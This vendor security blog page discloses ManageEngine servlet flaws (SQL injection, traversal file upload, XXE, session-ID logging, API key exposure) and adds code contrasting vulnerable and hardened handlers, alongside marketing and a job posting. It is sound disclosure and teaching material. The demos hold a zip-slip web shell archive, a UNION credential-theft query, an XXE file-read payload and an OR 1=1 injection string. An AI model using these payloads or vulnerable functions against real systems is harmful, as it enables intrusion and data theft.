Details: The com.adventnet.appmanager.servlets.comm.AAMRequestProcessor servlet can be accessed via a GET or POST request to /servlet/aam_servercmd without authentication. The AAMRequestProcessor servlet first checks to see if the build number supplied via the “bn” request parameter matches the build number of the current installation of Applications Manager. The build number of the targeted Applications Manager application can be found at the bottom of the login page at /index.do. AAMRequestProcessor also checks that the “time_stamp” and “port” request parameters are numbers. To get to the “addMAS” method of CommDBUtil, the “command” parameter should be set to “Register_Me_MAS” and the Applications Manager server should be configured as an admin server. The request parameters are converted to a Map and passed as an argument to the “addMAS” method of CommDBUtil where the “globalrange” request parameter is used directly in a SQL query without validation.

Impact: Full compromise of the Applications Manager application which can be leveraged to execute arbitrary code as SYSTEM when running on Windows, resulting in full host compromise.

Application/Version Affected:

Applications Manager 13 (Build 13420)

Details: The SyncEventServlet class can be accessed by either a GET or POST request to /servlet/SyncEventServlet. If the installation of Applications Manager is running as an admin server and the “operation” request parameter is set to “checkEventSynch”, then the “entity” request parameter will be used directly in a SQL query, without sanitization. Additionally, if Applications Manager is running as a managed server and the “operation” request parameter is set to “setPushModelStatus”, then the “EventID” request parameter will be used directly in a SQL query without sanitization.

Details: The FailOverHelperServlet class can be accessed by sending a POST request to /servlet/FailOverHelperServlet, with no authentication required. If the “operation” request parameter is set to “copyfile”, the servlet will pass the value of the “fileName” request parameter to the copyFile method. The copyFile method performs some basic filtering on the value of the “fileName” request parameter, including checking for directory traversal sequences and limiting the path to the “working” subdirectory of the Applications Manager install directory. Additionally, it will only retrieve the file if it has been modified since the last time it was downloaded. However, the working directory can contain interesting files, such as the PostgreSQL database data files, when configured to use the built-in PostgreSQL database. Additionally, there is a “listdirectory” operation in this servlet that will return a list of files and directories in the “working” directory, making it relatively easy to find potentially interesting files to download.
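Two of the findings above turn on the same question: does a caller-controlled file name end up inside the directory the code intended? The EventLog Analyzer extractor checked only that an expected substring appeared in the entry name, so a name with a traversal sequence still satisfied the check and was written outside the upload directory; the FailOverHelperServlet did confine the path, but the confined directory itself held database files. The following is an added example, not ManageEngine or Digital Defense code: a zip extractor written the way the first finding describes, next to one that canonicalizes each target path and refuses anything that resolves outside the destination. The tag list, entry names, and the "webroot" directory are constructed for the demonstration, and everything runs in a throwaway temp tree.

```python
"""Zip extraction with and without path confinement.

Added example, not ManageEngine or Digital Defense code. `vulnerable_extract`
mirrors the behaviour described in the disclosure (substring check on the
entry name, then a write); `safe_extract` adds the confinement check it
lacked. Tags, names and directories are constructed for the demo.
"""
import io
import os
import shutil
import tempfile
import zipfile

EXPECTED_TAGS = ("syslog", "eventlog", "agentdata")  # hypothetical "expected file type" strings


def build_malicious_zip() -> bytes:
    """Constructed upload: one benign entry, one whose name climbs out of the extraction dir."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("agentdata/host1.syslog", "benign payload")
        # zipfile stores the name verbatim; nothing here strips the traversal
        zf.writestr("../webroot/eventlog.jsp", "<% /* constructed web shell body */ %>")
    return buf.getvalue()


def vulnerable_extract(zip_bytes: bytes, dest: str) -> list:
    """Checks only that a known tag appears somewhere in the name, then writes to dest/name."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not any(tag in info.filename for tag in EXPECTED_TAGS):
                continue
            target = os.path.join(dest, info.filename)  # ".." survives the join untouched
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written


def is_confined(name: str, root: str) -> bool:
    """True only if root/name, after resolving '..' and symlinks, is still at or below root."""
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, name.replace("\\", "/")))
    return os.path.commonpath([root_real, target]) == root_real


def safe_extract(zip_bytes: bytes, dest: str):
    """Rejects absolute names and any name that escapes dest; returns (written, rejected)."""
    written, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if os.path.isabs(name) or not is_confined(name, dest):
                rejected.append(name)
                continue
            target = os.path.join(os.path.realpath(dest), name)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written, rejected


def demo() -> dict:
    """Run both extractors against the constructed archive inside a throwaway tree."""
    base = tempfile.mkdtemp()
    try:
        upload_dir = os.path.join(base, "server", "uploads")
        webroot = os.path.join(base, "server", "webroot")
        os.makedirs(upload_dir)
        os.makedirs(webroot)
        blob = build_malicious_zip()
        vuln_written = vulnerable_extract(blob, upload_dir)
        shell_landed = os.path.exists(os.path.join(webroot, "eventlog.jsp"))
        safe_written, rejected = safe_extract(blob, upload_dir)
        inside = os.path.realpath(upload_dir) + os.sep
        return {
            "vulnerable_wrote_outside": any(not p.startswith(inside) for p in vuln_written),
            "shell_in_webroot": shell_landed,
            "safe_rejected": rejected,
            "safe_written_count": len(safe_written),
        }
    finally:
        shutil.rmtree(base)
```

Note that the confinement check is necessary but not sufficient: the FailOverHelperServlet finding is exactly the case where the path stayed inside the permitted directory and the damage came from what that directory legitimately contained. The allowed directory has to be one that holds nothing an unauthenticated caller should read, and the read itself should still require authentication.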

Impact: Full compromise of the Applications Manager application which can be leveraged to execute arbitrary code as SYSTEM when running on Windows, resulting in full host compromise.

Application/Version Affected:

Applications Manager 13 (Build 13420)

Details: The MenuHandlerServlet servlet can be accessed via a GET or POST request to /servlet/MenuHandlerServlet without authentication. If the “action” request parameter is set to “verticalmenulist” the value of the “config_id” request parameter will be passed to the “getVerticalMenus” method. The “getVerticalMenus” method uses the value of “config_id” directly in a SQL query without fully validating it.
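The three Applications Manager SQL findings above share one shape: a request parameter is placed directly into a query, in the last case after validation that does not fully constrain it. The following added example (not ManageEngine or Digital Defense code; SQLite is used so it runs stand-alone) shows why a partial check of the kind "it starts with a digit" does nothing, and what the bound-parameter version looks like. The tables, columns, and the second table the query should never reach are constructed.

```python
"""Request parameter concatenated into SQL vs. a bound parameter.

Added example, not ManageEngine or Digital Defense code. The schema, the
"config_id" handling and the partial validation are constructed to mirror the
pattern the findings describe; SQLite stands in for the product's database.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema: a menu table plus a credentials table the menu query should never touch."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE menus (config_id INTEGER, label TEXT);
        INSERT INTO menus VALUES (1, 'Dashboard'), (1, 'Monitors'), (2, 'Admin');
        CREATE TABLE api_keys (username TEXT, apikey TEXT);
        INSERT INTO api_keys VALUES ('admin', 'k-constructed-0f3a');
    """)
    return con


def looks_numeric_enough(value: str) -> bool:
    """Partial validation of the kind that does not help: only the first character is checked."""
    return value[:1].isdigit()


def vulnerable_vertical_menus(con: sqlite3.Connection, config_id: str) -> list:
    """Passes the check, then concatenates the raw string into the statement."""
    if not looks_numeric_enough(config_id):
        raise ValueError("config_id must be numeric")
    sql = "SELECT label FROM menus WHERE config_id = " + config_id
    return [row[0] for row in con.execute(sql)]


def fixed_vertical_menus(con: sqlite3.Connection, config_id: str) -> list:
    """Converts to the expected type first, then binds; the value can never alter the statement."""
    cid = int(config_id)  # raises ValueError on anything that is not an integer literal
    return [row[0] for row in con.execute("SELECT label FROM menus WHERE config_id = ?", (cid,))]


def run_payload(payload: str) -> dict:
    """Run one constructed payload through both variants and report what each returned."""
    con = make_db()
    try:
        vulnerable = vulnerable_vertical_menus(con, payload)
    except ValueError:
        vulnerable = None
    try:
        fixed = fixed_vertical_menus(con, payload)
    except ValueError:
        fixed = None
    con.close()
    return {"vulnerable": vulnerable, "fixed": fixed}
```

The payload worth trying is `"1 UNION SELECT apikey FROM api_keys"`: it begins with a digit, so the check passes, and the UNION pulls the credential table into the menu response. The fixed version rejects it before any SQL is built, and for `"1"` both return the same two labels.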

Impact: Full compromise of the Applications Manager application which can be leveraged to execute arbitrary code as SYSTEM when running on Windows, resulting in full host compromise.

Application/Version Affected:

Applications Manager 13 (Build 13420)

Details: A GET request to /servlet/OPMRequestHandlerServlet where the “OPERATION_TYPE” request parameter is set to “APM_API_KEY_REQUEST” and the “USERNAME” request parameter is set to any valid user will return that user’s API key. Depending on the privilege level of the compromised user, this could result in full compromise of both the Applications Manager web application and the host running it.

ManageEngine is an innovative producer of enterprise IT management software, offering high-end functionality of large network management frameworks to enterprises worldwide. Currently, the company claims to have more than 40,000 customers worldwide, including three out of every five Fortune 500 companies.

“Our Vulnerability Research Team continues to work in tandem with ManageEngine to facilitate prompt resolution of the issues and a coordinated effort in the disclosure process that ensures customers make the necessary patches to mitigate any potential risk introduced by the vulnerabilities,” states Mike Cotton, senior vice president of engineering at Digital Defense.

What You Can Do

ManageEngine has addressed the vulnerabilities and is making patches available for each of the affected applications. Patches can be downloaded from the ManageEngine site. Digital Defense’s Frontline Vulnerability Manager™ includes checks for the flaws. Details surrounding the disclosure can be accessed at the Digital Defense blog.

Digital Defense Research Methodology and Practices

The Digital Defense VRT regularly works with organizations in the responsible disclosure of zero-day vulnerabilities. The expertise of the VRT, when coupled with the company’s next generation hybrid cloud platform, Frontline Vulnerability Manager, enables early detection capabilities. When zero-days are discovered and internally validated, the VRT immediately contacts the affected vendor to notify the organization of the new finding(s) and then assists, wherever possible, with the vendor’s remediation actions.


Join Us at RSA Conference 2018 | Booth #3230

Digital Defense, Inc.

When: April 16-20, 2018

Where: Moscone Center, San Francisco, CA

Booth #: 3230 (North Hall)

Digital Defense, Inc. is excited to announce that we will have a significant presence at RSA Conference 2018™, where the world’s best and brightest in the field learn about IT security’s most important issues.

Attending RSA? We invite you to visit us at booth #3230 to experience Frontline.Cloud, our next generation vulnerability management platform.

This annual list recognizes North American solution providers with cutting-edge approaches to delivering managed services. Their offerings help companies navigate the complex and ever-changing landscape of IT, improve operational efficiencies, and maximize their return on IT investments.

In today’s fast-paced business environments, MSPs play an important role in helping companies leverage new technologies without straining their budgets or losing focus on their core business. CRN’s MSP 500 list shines a light on the most forward-thinking and innovative of these key organizations.

The list is divided into three categories: the MSP Pioneer 250, recognizing companies with business models weighted toward managed services and largely focused on the SMB market; the MSP Elite 150, recognizing large, data center-focused MSPs with a strong mix of on-premises and off-premises services; and the Managed Security 100, recognizing MSPs focused primarily on off-premise, cloud-based security services.

Digital Defense offers channel partners a portfolio of security risk assessment solutions underpinned by patented technology that benefits the partners’ customers with unparalleled accuracy and flexibility, ease of use and superior support and service. Partners enjoy a steady revenue stream, short sales cycles, increased margins and a high client retention rate – all critical to a successful channel partner engagement.

“Managed service providers have become integral to the success of businesses everywhere, both large and small,” said Bob Skelley, CEO of The Channel Company. “Capable MSPs enable companies to take their cloud computing to the next level, streamline spending, effectively allocate limited resources and navigate the vast field of available technologies. The companies on CRN’s 2018 MSP 500 list stand out for their innovative services, excellence in adapting to customers’ changing needs and demonstrated ability to help businesses get the most out of their IT investments.”

“The Digital Defense Partner Program is structured to answer channel needs based on customer demand,” said Rosanna Pellegrino, SVP sales and business development at Digital Defense, Inc. “Digital Defense’s industry recognized technology is integrated with numerous industry-leading security platforms, creating comprehensive customer solutions that provide significant opportunities to increase both product and services revenue. Strong financial opportunities combined with sales and marketing support, ensure a great opportunity to improve security and grow profits.”

The MSP 500 list will be featured in the February 2018 issue of CRN and online at www.CRN.com/msp500.


Software Developer

Careers

Digital Defense has an immediate opening for a Software Developer to work in our Research & Development DevOps team, helping to build out our next generation security technology platform. Candidates must have prior experience working on server-side code (preferably Python or Ruby) for web-applications, ideally using modern frameworks such as Django, Rails or NodeJS. The position will entail both developing new capabilities for our Frontline system, and helping to integrate our technology with other leading security solutions through their backend APIs.

Digital Defense is a profitable, privately held network security company with solid growth, a great team-oriented culture and a flexible work environment. We offer stock options, 401k, health insurance and other standard benefits.

The candidate must live in or be willing to relocate to the San Antonio, TX, area.

Skills / Requirements:

Highly proficient in at least one major scripting language (Python, Ruby or Perl).

Experience building large webapps on Django, Rails or similar web frameworks which utilize ORM abstraction is a plus.

Experience working with the Linux operating system and at least one major Linux web server (Apache, Nginx, Lighttpd).

Experience working with SQL databases such as Postgres or MySQL, query optimization, and relational database design fundamentals.

Experience working with web application caching technologies such as Memcached or Redis is a plus.

Good understanding of web protocols and formats such as HTTP, SSL/TLS, JSON, XML-RPC and REST API interaction.

Experience with designing and writing unit-tests for your code is a plus.

Education & Experience

Bachelor’s degree in Computer Science or a related technical field from an accredited university is preferred.

Personality:

Detail-oriented, with a passion for automation.

Must be capable of working both independently and as part of a dynamic team.

Desire the simple, elegant solution over the complex solution.

Other information:

All applicants must pass a credit and criminal background investigation prior to employment.

ManageEngine

Blog

Update March 21, 2018: Added additional vulnerabilities disclosed to ManageEngine that were excluded from the original blog post affecting several additional ManageEngine applications.

Digital Defense is disclosing multiple vulnerabilities identified on various ManageEngine applications discovered by our Vulnerability Research Team (VRT). We commend ManageEngine for their prompt response to the identified flaws and their engineering team’s work with VRT to provide fixes for these security issues.

ManageEngine has provided patches for each of the vulnerabilities identified on the applications. The patched applications can be downloaded from ManageEngine’s website.

Clients who currently use Digital Defense’s Frontline Vulnerability Manager™ platform can sweep for the presence of these issues by performing a full vulnerability assessment scan or selecting CVC’s ManageEngine OpManager Multiple Vulnerabilities (123568) and

Details:

Vulnerability: Unauthenticated Arbitrary File Upload with Directory Traversal via CmClientUtilServlet

Impact: Unauthenticated remote code execution as SYSTEM when running on Windows, leading to full host compromise.

Application/Version Affected:

ServiceDesk Plus MSP 9.3 (Build 9302)

ServiceDesk Plus 9.3 (Build 9328)

Details: CmClientUtilServlet can be accessed without authentication. If the “command” request parameter is set to “addAttachmentInfo”, the “addAttachmentInfo” method is called. This method does not check whether the “TYPE” request parameter contains a directory traversal sequence before using it in the path of the file it creates. The value of this parameter is also passed to the “addAttachments” method of the com.adventnet.servicedesk.kbase.util.AttachmentUtil class, which in turn calls the “moveAttachments” method of AttachmentUtil. “moveAttachments” uses the value of the “TYPE” request parameter in the destination path, so a traversal sequence can be used to write the uploaded file into a directory that is served to remote clients. Additionally, since none of these methods check the file extension, an attacker can upload a JSP web shell and use it to run commands as SYSTEM, fully compromising the host running ServiceDesk Plus.

Vulnerability: Blind SQL Injection via RegisterAgent servlet (monagentID parameter)

Impact: Blind SQL injection that can be leveraged to fully compromise the ManageEngine application and the host running it.

Application/Version Affected:

OpManager 12.3 (Build 123002)

Firewall Analyzer 12.3 (Build 12.3.008)

Network Configuration Manager 12.3 (Build 12.3.008)

OpUtils 12.3 (Build 12.3.005)

NetFlow Analyzer 12.3 (Build 12.3.009)

Details: The com.manageengine.opmanager.agent.servlets.RegisterAgent class passes the GET request parameters to the doRegister method of the com.manageengine.opmanager.agent.RegisterAgentImpl class. The doRegister method passes the monagentID parameter to the getAgentKeyForHostName method of the com.manageengine.opmanager.agent.utils.AgentDetailsUtil class. The getAgentKeyForHostName method inserts the user controlled value of monagentID directly into a SQL query without any sanitization.

Vulnerability: Blind SQL Injection via StatusUpdateServlet and AgentActionServlet (agentKey parameter)

Impact: Blind SQL injection that can be leveraged to fully compromise the ManageEngine application and the host running it.

Application/Version Affected:

OpManager 12.3 (Build 123002)

Firewall Analyzer 12.3 (Build 12.3.008)

Network Configuration Manager 12.3 (Build 12.3.008)

OpUtils 12.3 (Build 12.3.005)

NetFlow Analyzer 12.3 (Build 12.3.009)

Details: The com.manageengine.opmanager.agent.servlets.StatusUpdateServlet class passes the GET parameters to the updateAgentStatus method of the com.manageengine.opmanager.agent.AgentStatusHandler class. This method passes the agentKey GET parameter to the getDeviceNameForAgentKey method of the com.manageengine.opmanager.agent.utils.AgentDetailsUtil class which uses it directly in a SQL query without any sanitization. The getDeviceNameForAgentKey method can also be exploited via the com.manageengine.opmanager.agent.servlets.AgentActionServlet class if the “operation” request parameter is set to triggerFileMonitoringAlert.

Vulnerability: User Enumeration via /servlets/ConfServlet

Impact: Username and information disclosure.

Application/Version Affected:

OpManager 12.3 (Build 123002)

Firewall Analyzer 12.3 (Build 12.3.008)

Network Configuration Manager 12.3 (Build 12.3.008)

OpUtils 12.3 (Build 12.3.005)

NetFlow Analyzer 12.3 (Build 12.3.009)

Details: The ConfServlet class can be accessed via requests sent to /servlets/ConfServlet. If the DATA_REG query parameter is set to NOCUSER, the handleNocUserDetail method is called and will return a serialized Java HashMap containing local authentication user information, such as usernames, email addresses and phone numbers.

Vulnerability: Blind SQL Injection via EmbedAPIServlet (/embedWidget)

Impact: Blind SQL injection that can be leveraged to fully compromise the ManageEngine application and the host running it.

Application/Version Affected:

OpManager 12.3 (Build 123002)

Firewall Analyzer 12.3 (Build 12.3.008)

Network Configuration Manager 12.3 (Build 12.3.008)

OpUtils 12.3 (Build 12.3.005)

NetFlow Analyzer 12.3 (Build 12.3.009)

Details: The com.manageengine.opmanager.servlet.EmbedAPIServlet class handles requests sent to /embedWidget and calls different classes and methods depending on the value of the methodCall HTTP request parameter. If the methodCall parameter is set to getBusinessViewDeviceList, EmbedAPIServlet will call the getBusinessViewDeviceList method of the com.adventnet.me.opmanager.server.api.handler.BusinessViewApiHandler class. This method then passes the value of the bvName request parameter to the getDeviceListByBV method of the APIDBUtil class where it’s used in a SQL query. If the methodCall parameter is set to getWidgetDeviceListForVendor, EmbedAPIServlet will call the getWidgetDeviceListForVendor method of the com.adventnet.me.opmanager.server.api.handler.DashboardApiHandler class. The getWidgetDeviceListForVendor method passes the value of the vendorid request parameter to the getWidgetDeviceListForVendor method of the APIDBUtil class where it’s used in a SQL query. If the methodCall parameter is set to GMapDetails, EmbedAPIServlet will call the GMapDetails method of the MapsApiHandler class. The GMapDetails method passes the value of the deviceType and deviceName request parameters to the getGMapObjects method of the APIDBUtil class where they’re used in a SQL query. No sanitization is performed on the vulnerable parameters before they’re used directly in a SQL query.

Vulnerability: XML External Entity (XXE) Injection via SNMPDiscoveryServlet

Impact: Arbitrary file read on the host running ManageEngine OpManager.

Details: The SNMPDiscoveryServlet accepts POST requests whose body is expected to be XML. The POST requests are handled by the doGet method, which reads the body of the request and parses it with a DocumentBuilderFactory that has not been configured to disallow DOCTYPE declarations. Because the default parser resolves external entities, an attacker can supply a DOCTYPE declaring an entity that points at a local file and retrieve the contents of files on the host running ManageEngine OpManager.
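The root cause is the default JAXP parser configuration. The Java below is an added illustration, not ManageEngine’s code and not code from this advisory: it shows the vulnerable default beside a hardened factory. The sample document, its element names and the file path in the entity are constructed for the demonstration. With the hardened factory, the JDK’s built-in parser refuses the document at the DOCTYPE declaration with a SAXParseException, so the entity is never resolved.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class XmlParsing {

    // Constructed sample body (not from the advisory): an external entity that reads a local
    // file and echoes it into an element, the classic XXE payload shape.
    static final String SAMPLE_XXE_BODY =
        "<?xml version=\"1.0\"?>\n" +
        "<!DOCTYPE discovery [<!ENTITY xxe SYSTEM \"file:///etc/hostname\">]>\n" +
        "<discovery><community>&xxe;</community></discovery>";

    // Vulnerable pattern: a default factory. DOCTYPE is accepted and external
    // entities are resolved, so &xxe; expands to the file's contents.
    static Document parseUnsafe(String body)
            throws ParserConfigurationException, SAXException, IOException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        DocumentBuilder db = dbf.newDocumentBuilder();
        return db.parse(new InputSource(new StringReader(body)));
    }

    // Hardened factory: refuse DOCTYPE outright (stops XXE and entity-expansion DoS), and
    // additionally disable external entity and DTD loading in case the first feature is
    // unsupported by whichever parser implementation is on the classpath.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        // JAXP 1.5 properties: no external DTDs or schemas over any protocol.
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return dbf;
    }

    static Document parseSafe(String body)
            throws ParserConfigurationException, SAXException, IOException {
        DocumentBuilder db = hardenedFactory().newDocumentBuilder();
        return db.parse(new InputSource(new StringReader(body)));
    }

    public static void main(String[] args) throws Exception {
        try {
            parseSafe(SAMPLE_XXE_BODY);
            System.out.println("unexpected: DOCTYPE was accepted");
        } catch (SAXException e) {
            // Expected path: the parser stops at the DOCTYPE before any entity is touched.
            System.out.println("rejected as expected: " + e.getMessage());
        }
    }
}
```

Disallowing DOCTYPE is the single most useful setting because it also stops entity-expansion denial of service. If setFeature throws ParserConfigurationException because the underlying parser does not support a feature, fail closed rather than falling back to the default factory.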

Vulnerability: Blind SQL Injection via ELARequestHandler and NPMRequestHandler (userName parameter)

Impact: Blind SQL injection that can be leveraged to fully compromise the ManageEngine application and the host running it.

Application/Version Affected:

OpManager 12.3 (Build 123002)

Firewall Analyzer 12.3 (Build 12.3.008)

Network Configuration Manager 12.3 (Build 12.3.008)

OpUtils 12.3 (Build 12.3.005)

NetFlow Analyzer 12.3 (Build 12.3.009)

Details: The com.adventnet.me.eventlog.ELARequestHandler servlet will call the getThemeForUser method when the “action” parameter is set to getTheme. The getThemeForUser method will then call the getThemeForUserName method of the OpManagerDBUtil class and pass it the value of the userName parameter from the GET request. The getThemeForUserName will then use the value of userName directly in a SQL query. The same path to getThemeForUserName is also available via /unauthenticatedservlets/NPMRequestHandler.
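The four blind SQL injection entries above (monagentID in RegisterAgent, agentKey in StatusUpdateServlet and AgentActionServlet, bvName, vendorid, deviceType and deviceName in EmbedAPIServlet, and userName in ELARequestHandler and NPMRequestHandler) share one root cause: a request parameter spliced into the text of a SQL statement. The Java below is an added example, not ManageEngine’s code and not code from this advisory. The table and column names are invented for the illustration, it assumes the caller supplies a JDBC Connection, and Set.of needs Java 9 or later.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.Set;

public class AgentLookup {

    // Vulnerable shape: the parameter becomes part of the statement. Nothing from the
    // result set needs to reach the client; a condition that is true, false or slow
    // changes the response, which is all a blind injection needs to extract data.
    static String unsafeQueryText(String agentKey) {
        return "SELECT devicename FROM agent_details WHERE agentkey = '" + agentKey + "'";
    }

    static String getDeviceNameUnsafe(Connection conn, String agentKey) throws SQLException {
        try (Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery(unsafeQueryText(agentKey))) {
            return rs.next() ? rs.getString(1) : null;
        }
    }

    // Hardened shape: the statement text is a constant and the value is bound as a
    // parameter, so quotes or comment sequences inside agentKey are only ever data.
    static String getDeviceNameSafe(Connection conn, String agentKey) throws SQLException {
        try (PreparedStatement ps = conn.prepareStatement(
                "SELECT devicename FROM agent_details WHERE agentkey = ?")) {
            ps.setString(1, agentKey);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString(1) : null;
            }
        }
    }

    // Identifiers cannot be bound. If a caller-controlled value such as a deviceType-style
    // parameter has to choose a table or column, map it through a fixed allowlist
    // (hypothetical table names here) instead of interpolating it.
    private static final Set<String> DEVICE_TABLES = Set.of("routers", "switches", "servers");

    static String tableForDeviceType(String deviceType) {
        if (!DEVICE_TABLES.contains(deviceType)) {
            throw new IllegalArgumentException("unknown device type");
        }
        return deviceType;
    }

    public static void main(String[] args) {
        // Constructed payload: the kind of boolean condition a blind injection varies.
        String payload = "x' OR 1=1 --";
        System.out.println(unsafeQueryText(payload));
    }
}
```

Running main shows how the quote in the payload closes the literal and the trailing comment swallows the original closing quote, which is exactly what the bound parameter in getDeviceNameSafe makes impossible.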

UPDATE:

Two additional vulnerabilities disclosed to ManageEngine in January were excluded from the original blog post.

Vulnerability: Session ID Disclosure via access_log.txt

Impact: Sensitive information disclosure, including valid HTTP session IDs. This information can be used to fully compromise the web application.

Application/Version Affected:

Exchange Reporter Plus 5.2 (Build 5204)

AD360 4.1 (Build 4116)

Cloud Security Plus 4.0 (Build 4006)

Details: The access_log.txt file contains basic HTTP request information for requests sent to the web application, including the session ID. If a privileged user has logged into the application recently, this information could be used by an attacker to hijack the privileged user’s session and compromise the web application.
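The fix is to keep session identifiers out of the access log in the first place. The Java below is an added example, not ManageEngine’s code and not code from this advisory; it assumes the session ID appears in the standard servlet-container forms (a ;jsessionid= URL rewrite or a JSESSIONID cookie), and the log lines are constructed for the demonstration.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class AccessLogRedactor {

    // Session identifiers as servlet containers emit them: ";jsessionid=..." in the request
    // line (URL rewriting) and "JSESSIONID=..." in a logged Cookie header. Case-insensitive so
    // both spellings match; extend the alternation for application-specific cookie names.
    private static final Pattern SESSION_TOKEN =
        Pattern.compile("(?i)(jsessionid=)[A-Za-z0-9._~-]+");

    // Replace the token value, keeping the name so the line still reads naturally.
    static String redact(String line) {
        Matcher m = SESSION_TOKEN.matcher(line);
        return m.replaceAll("$1[REDACTED]");
    }

    // Constructed sample lines in a common-log-like layout (not from the advisory).
    static final String[] SAMPLE = {
        "10.0.0.5 - admin [21/Mar/2018:10:15:02 +0000] "
            + "\"GET /home.do;jsessionid=ABCDEF0123456789 HTTP/1.1\" 200 5120",
        "10.0.0.7 - - [21/Mar/2018:10:15:09 +0000] "
            + "\"POST /login HTTP/1.1\" 302 0 \"JSESSIONID=FEDCBA9876543210; theme=dark\"",
    };

    public static void main(String[] args) {
        for (String line : SAMPLE) {
            System.out.println(redact(line));
        }
    }
}
```

Redaction is the fallback; the better fix is to configure the container not to log the Cookie header at all and to restrict read access to the log file so that it is not reachable through the web application.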

Vulnerability: Arbitrary File Upload via FileUploadServlet (Registry_Upload)

Impact: Arbitrary code execution as SYSTEM and full compromise of the host running Desktop Central. This can then be leveraged to compromise connected assets via the remote management functionality in Desktop Central.

Application/Version Affected:

Desktop Central 10 (Build 10.0.139)

Desktop Central MSP 10 (Build 10.0.147)

Patch Manager Plus 10 (Build 10.0.123)

Details: The FileUploadServlet can be accessed via a POST request to /fileupload. If the value of the “action” request parameter is set to “Registry_Upload” the remoteRegistryUpload method will be called to handle the upload of a zip file. The uploaded zip file is extracted to a predictable path that can be accessed without authentication and the contents of the zip file are not validated. This can be leveraged to upload a zip file containing a JSP web shell which can run commands with SYSTEM privileges.
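Both file-upload findings on this page (the ServiceDesk Plus “TYPE” parameter used in the attachment path, and the Desktop Central zip extracted to a predictable, unauthenticated path) reduce to two missing checks: the destination must stay inside the intended directory, and the file name must not be something the container executes. The Java below is an added example, not ManageEngine’s code and not code from this advisory. The upload root, the allowed extensions and the sample archive are constructed for the illustration, and Set.of needs Java 9 or later.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;
import java.util.Locale;
import java.util.Set;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

public class SafeUpload {

    // Hypothetical allowlist: anything the servlet container would execute (jsp, jspx, war)
    // is simply absent. The upload root itself should live outside the web root so that even
    // an allowed file is never served directly.
    static final Set<String> ALLOWED_EXT = Set.of("txt", "log", "csv", "png", "jpg", "pdf");

    // Resolve an untrusted relative name under base and reject anything that escapes it.
    // "../" sequences and absolute paths both fail the startsWith check after normalisation.
    static Path resolveInside(Path base, String untrusted) throws IOException {
        Path realBase = base.toRealPath();
        Path candidate = realBase.resolve(untrusted).normalize();
        if (!candidate.startsWith(realBase)) {
            throw new IOException("path escapes upload root: " + untrusted);
        }
        return candidate;
    }

    static boolean extensionAllowed(String name) {
        int dot = name.lastIndexOf('.');
        if (dot < 0 || dot == name.length() - 1) return false;
        return ALLOWED_EXT.contains(name.substring(dot + 1).toLowerCase(Locale.ROOT));
    }

    // Store one uploaded file where a request-supplied "type" selects the subdirectory,
    // the shape that goes wrong when "type" is used unchecked.
    static Path storeUpload(Path base, String type, String fileName, InputStream data)
            throws IOException {
        if (!extensionAllowed(fileName)) throw new IOException("extension not allowed: " + fileName);
        Path dest = resolveInside(base, type + "/" + fileName);
        Files.createDirectories(dest.getParent());
        Files.copy(data, dest, StandardCopyOption.REPLACE_EXISTING);
        return dest;
    }

    // Extract an uploaded zip into base, validating every member name the same way (zip-slip)
    // and applying the extension allowlist to each member. Callers should extract into a fresh
    // staging directory and discard it if this throws, so a rejected archive leaves nothing behind.
    static int extractZip(Path base, InputStream zipData) throws IOException {
        int written = 0;
        try (ZipInputStream zin = new ZipInputStream(zipData)) {
            for (ZipEntry e = zin.getNextEntry(); e != null; e = zin.getNextEntry()) {
                Path dest = resolveInside(base, e.getName());
                if (e.isDirectory()) { Files.createDirectories(dest); continue; }
                if (!extensionAllowed(e.getName())) {
                    throw new IOException("zip member not allowed: " + e.getName());
                }
                Files.createDirectories(dest.getParent());
                Files.copy(zin, dest, StandardCopyOption.REPLACE_EXISTING);
                written++;
            }
        }
        return written;
    }

    public static void main(String[] args) throws IOException {
        Path staging = Files.createTempDirectory("upload-staging");
        // Constructed archive: one benign member, then a zip-slip member carrying a JSP.
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ZipOutputStream zout = new ZipOutputStream(bytes)) {
            zout.putNextEntry(new ZipEntry("report.txt"));
            zout.write("ok".getBytes(StandardCharsets.UTF_8));
            zout.closeEntry();
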